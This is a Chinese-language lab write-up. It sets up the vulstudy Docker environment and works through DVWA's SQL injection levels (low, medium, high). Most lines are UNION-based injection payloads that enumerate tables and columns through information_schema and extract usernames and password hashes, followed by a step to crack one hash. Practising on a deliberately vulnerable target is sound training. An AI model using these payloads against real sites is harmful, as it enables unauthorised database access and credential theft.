vulstudy之DVWAsql注入练习
Vulstudy/DVWA sql注入练习
目录
一.Vulstudy搭建
vulstudy vulstudy是专门收集当下流行的漏洞学习平台,并将其制作成docker镜像,方便大家快速搭建环境,节省搭建时间,专注于漏洞学习上。包含以下漏洞平台 下面就来详细介绍下环境搭建过程。
项目地址:
https://github.com/c0ny1/vulstudy.git
本人使用的是ubuntu7.5.0
命令:
git clone https://github.com/c0ny1/vulstudy.git
Cd DVWA
Docker-compose up -d 启动
访问浏览器,搭建成功
二.Sql注入
Low级别
1‘and 1=1
报错
1‘and 1=1#
猜字段
1‘and 1=1 order by 2 #
1‘and 1=1 order by 3 #
报错
可知显示字段只有两位。
联合查询
-1' union select 1,2#
发现注入成功,查询版本。
-1' union select version(),database()#
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'
1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='users'
获取用户信息
1' union select user,password from users #
挑一个密码md解密
medium级别
注入点不好判断,直接用burp抓包
id=1 and 1=1
没报错,注入点应为数字注入型
id=1 union select version(),2
后续思路和上一关一样,最后直接查询密码。
id=1 union select user,password from users #
High级别
所谓high级别就是报错只回显 Something went wrong 界面
其实和第一关差不多。
1' union select user,password from users#
至此DVWA sql注入靶场完成。
